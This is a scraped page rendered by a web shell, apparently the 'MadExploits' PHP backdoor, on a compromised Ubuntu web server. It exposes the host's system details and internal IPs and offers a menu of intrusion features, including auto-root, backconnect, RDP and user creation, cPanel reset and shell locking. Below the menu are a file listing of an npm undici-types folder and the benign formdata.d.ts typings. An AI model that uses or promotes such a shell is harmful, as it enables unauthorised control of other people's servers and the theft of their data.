Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
undici-types /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE
1.06
KB
-rw-r--r--
README.md
455
B
-rw-r--r--
agent.d.ts
1.04
KB
-rw-r--r--
api.d.ts
1.42
KB
-rw-r--r--
balanced-pool.d.ts
961
B
-rw-r--r--
cache.d.ts
1.22
KB
-rw-r--r--
client.d.ts
4.85
KB
-rw-r--r--
connector.d.ts
1
KB
-rw-r--r--
content-type.d.ts
561
B
-rw-r--r--
cookies.d.ts
635
B
-rw-r--r--
diagnostics-channel.d.ts
1.54
KB
-rw-r--r--
dispatcher.d.ts
13.89
KB
-rw-r--r--
env-http-proxy-agent.d.ts
675
B
-rw-r--r--
errors.d.ts
4.18
KB
-rw-r--r--
eventsource.d.ts
1.61
KB
-rw-r--r--
fetch.d.ts
5.44
KB
-rw-r--r--
file.d.ts
1.67
KB
-rw-r--r--
filereader.d.ts
1.4
KB
-rw-r--r--
formdata.d.ts
4.88
KB
-rw-r--r--
global-dispatcher.d.ts
276
B
-rw-r--r--
global-origin.d.ts
175
B
-rw-r--r--
handlers.d.ts
447
B
-rw-r--r--
header.d.ts
133
B
-rw-r--r--
index.d.ts
3.31
KB
-rw-r--r--
interceptors.d.ts
922
B
-rw-r--r--
mock-agent.d.ts
2.48
KB
-rw-r--r--
mock-client.d.ts
1002
B
-rw-r--r--
mock-errors.d.ts
338
B
-rw-r--r--
mock-interceptor.d.ts
3.81
KB
-rw-r--r--
mock-pool.d.ts
974
B
-rw-r--r--
package.json
1.17
KB
-rw-r--r--
patch.d.ts
691
B
-rw-r--r--
pool-stats.d.ts
669
B
-rw-r--r--
pool.d.ts
1.3
KB
-rw-r--r--
proxy-agent.d.ts
780
B
-rw-r--r--
readable.d.ts
1.7
KB
-rw-r--r--
retry-agent.d.ts
232
B
-rw-r--r--
retry-handler.d.ts
2.91
KB
-rw-r--r--
util.d.ts
623
B
-rw-r--r--
webidl.d.ts
5.78
KB
-rw-r--r--
websocket.d.ts
3.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : formdata.d.ts
// Based on https://github.com/octet-stream/form-data/blob/2d0f0dc371517444ce1f22cdde13f51995d0953a/lib/FormData.ts (MIT) /// <reference types="node" /> import { File } from './file' import { SpecIterableIterator } from './fetch' /** * A `string` or `File` that represents a single value from a set of `FormData` key-value pairs. */ declare type FormDataEntryValue = string | File /** * Provides a way to easily construct a set of key/value pairs representing form fields and their values, which can then be easily sent using fetch(). */ export declare class FormData { /** * Appends a new value onto an existing key inside a FormData object, * or adds the key if it does not already exist. * * The difference between `set()` and `append()` is that if the specified key already exists, `set()` will overwrite all existing values with the new one, whereas `append()` will append the new value onto the end of the existing set of values. * * @param name The name of the field whose data is contained in `value`. * @param value The field's value. This can be [`Blob`](https://developer.mozilla.org/en-US/docs/Web/API/Blob) or [`File`](https://developer.mozilla.org/en-US/docs/Web/API/File). If none of these are specified the value is converted to a string. * @param fileName The filename reported to the server, when a Blob or File is passed as the second parameter. The default filename for Blob objects is "blob". The default filename for File objects is the file's filename. */ append(name: string, value: unknown, fileName?: string): void /** * Set a new value for an existing key inside FormData, * or add the new field if it does not already exist. * * @param name The name of the field whose data is contained in `value`. * @param value The field's value. This can be [`Blob`](https://developer.mozilla.org/en-US/docs/Web/API/Blob) or [`File`](https://developer.mozilla.org/en-US/docs/Web/API/File). If none of these are specified the value is converted to a string. * @param fileName The filename reported to the server, when a Blob or File is passed as the second parameter. The default filename for Blob objects is "blob". The default filename for File objects is the file's filename. * */ set(name: string, value: unknown, fileName?: string): void /** * Returns the first value associated with a given key from within a `FormData` object. * If you expect multiple values and want all of them, use the `getAll()` method instead. * * @param {string} name A name of the value you want to retrieve. * * @returns A `FormDataEntryValue` containing the value. If the key doesn't exist, the method returns null. */ get(name: string): FormDataEntryValue | null /** * Returns all the values associated with a given key from within a `FormData` object. * * @param {string} name A name of the value you want to retrieve. * * @returns An array of `FormDataEntryValue` whose key matches the value passed in the `name` parameter. If the key doesn't exist, the method returns an empty list. */ getAll(name: string): FormDataEntryValue[] /** * Returns a boolean stating whether a `FormData` object contains a certain key. * * @param name A string representing the name of the key you want to test for. * * @return A boolean value. */ has(name: string): boolean /** * Deletes a key and its value(s) from a `FormData` object. * * @param name The name of the key you want to delete. */ delete(name: string): void /** * Executes given callback function for each field of the FormData instance */ forEach: ( callbackfn: (value: FormDataEntryValue, key: string, iterable: FormData) => void, thisArg?: unknown ) => void /** * Returns an [`iterator`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Iteration_protocols) allowing to go through all keys contained in this `FormData` object. * Each key is a `string`. */ keys: () => SpecIterableIterator<string> /** * Returns an [`iterator`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Iteration_protocols) allowing to go through all values contained in this object `FormData` object. * Each value is a [`FormDataValue`](https://developer.mozilla.org/en-US/docs/Web/API/FormDataEntryValue). */ values: () => SpecIterableIterator<FormDataEntryValue> /** * Returns an [`iterator`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Iteration_protocols) allowing to go through the `FormData` key/value pairs. * The key of each pair is a string; the value is a [`FormDataValue`](https://developer.mozilla.org/en-US/docs/Web/API/FormDataEntryValue). */ entries: () => SpecIterableIterator<[string, FormDataEntryValue]> /** * An alias for FormData#entries() */ [Symbol.iterator]: () => SpecIterableIterator<[string, FormDataEntryValue]> readonly [Symbol.toStringTag]: string }
Close